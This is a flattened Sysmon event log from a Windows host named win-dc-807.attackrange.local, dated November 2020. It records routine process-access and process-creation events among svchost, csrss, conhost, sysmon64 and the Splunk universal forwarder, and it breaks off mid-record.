15:51:16.973{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C74-5FA1-4800-000000008801}2436C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001798Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.956{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4800-000000008801}2436C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001797Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.956{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C74-5FA1-4800-000000008801}2436C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001796Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.941{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-4700-000000008801}3244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001795Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.941{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001794Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.941{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001793Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.941{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001792Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.941{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001791Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001790Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001789Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001788Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001787Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4700-000000008801}3244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001786Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001785Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C74-5FA1-4600-000000008801}40884092C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{D28789B6-7C74-5FA1-4700-000000008801}3244C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001784Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.940{D28789B6-7C74-5FA1-4700-000000008801}3244C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{D28789B6-7C74-5FA1-4600-000000008801}4088C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000001783Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C74-5FA1-4600-000000008801}4088C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001782Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001781Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001780Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001779Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001778Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001777Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001776Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001775Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001774Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001773Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C74-5FA1-4600-000000008801}4088C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001772Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:16.925{D28789B6-7C74-5FA1-4500-000000008801}40764080C:\Windows\system32\cmd.exe{D28789B6-7C74-5FA1-4600-000000008801}4088C:\Program 